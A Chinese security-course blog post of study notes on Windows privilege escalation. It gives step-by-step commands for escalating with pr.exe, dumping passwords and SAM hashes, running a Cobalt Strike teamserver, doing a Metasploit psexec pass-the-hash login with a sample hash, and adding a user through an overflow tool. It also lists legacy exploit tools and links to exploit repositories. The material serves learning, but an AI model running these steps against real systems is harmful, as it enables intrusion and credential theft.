美文网首页
网络安全-Day47-wind提权(一)

网络安全-Day47-wind提权(一)

作者: K8s_Docker | 来源:发表于2020-05-05 16:52 被阅读0次

服务器密码获取实试(可以用cs代替)

1、上传cmd(我的是x32的操作系统)

2、执行setp c:\wmpub\cmd.exe设置终端路径(使用c:\wmpub路径下的cmd)

3、上传pr.exe和GetPass.exe(pr.exe提权;GetPass.exe读取密码)

4、启动cobaltstrike服务端

    4.1、cd /mnt/cobaltstrike/

    4.2、./teamserver 192.168.31.234 root

5、启动客户端,创建监听→主机上线

6、执行命令,读取名密码(shell pr "GetPass.exe" >>C:\wmpub\6.txt)

7、下载6.txt文件,查看密码

通过低版kail2.0完成hash远程连接

1、上传GetHashes.exe工具(读取hash值)

2、读取本地hash(pr.exe "GetHashes.exe $local")

注意:用户信息一般保存在C:\WINDOWS\system32\config\SAM文件中

3、打开msfconsole

4、配置连信息

    4.1、use exploit/windows/smb/psexec

    4.2、set RHOST 192.168.31.115

    4.3、set SMBUser Administrator

    4.4、set SMBPass 1E582C63EF02015AAAD3B435B51404EE:042BDA97096B7EFD74316D5237AED48F

    4.5、运行(exploit)

    4.6下图表示连接成功(需要kali2.0的版本,执行shell命令成功)

windows溢出提权

提权常用命令

whoami ——查看用户权限

systeminfo ——查看操作系统,补丁情况

ipconfig——查看当前服务器IP ipconfig /all

net user——查看当前用户情况

netstat ——查看当前网络连接情况  netstat –ano  /netstat –an | find “ESTABLISHED”

tasklist ——查看当前进程情况 tasklist /svc

taskkill ——结束进程 taskkill -PID xx

netstart  ——启动服务

net stop ——停止服务

1、上传cmd.exe

2、设置终端路(setp C:\wmpub\cmd_server2003.exe)

3、查询补丁安装情况(systeminfo)

4、上传debug.exe文件(带参数的新增用户文件)

5、执行命令debug.exe(会新增一个temp用户)

6、查看用户权限

常用提权方法

溢出漏洞提权、数据库提权、第三方软件提权

写出操作系统溢出提权常用工具及漏洞名称

常用提权工具:
1、KB952004 MS09-012---Pr.exe

2、KB956572 MS09-012---巴西烤肉

3、Wshelp 被动提权工具

其他提权:

1、sql2 ms-sql的远程溢出工具

2、thcsql ms-sql的远程溢出工具

3、ispc unicode漏洞的利用工具

4、lis5hack及idahack .printer漏洞的远程溢出工具

5、snake IIS Snake ida、idq的远程溢出工具

6、aspcode asp漏洞远程溢出工具

7、webdavx3 webdav漏洞远程溢出工具(isno)

8、webdav webdav漏洞溢出工具(yuange)

9、rpc_locator及rpc RPC LOCATOR漏洞的远程溢出工具

详细工具:

https://download.csdn.net/download/havefaith1/7465637

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/WindowsExploits/Exploits

相关文章

网友评论

      本文标题:网络安全-Day47-wind提权(一)

      本文链接:https://www.haomeiwen.com/subject/serughtx.html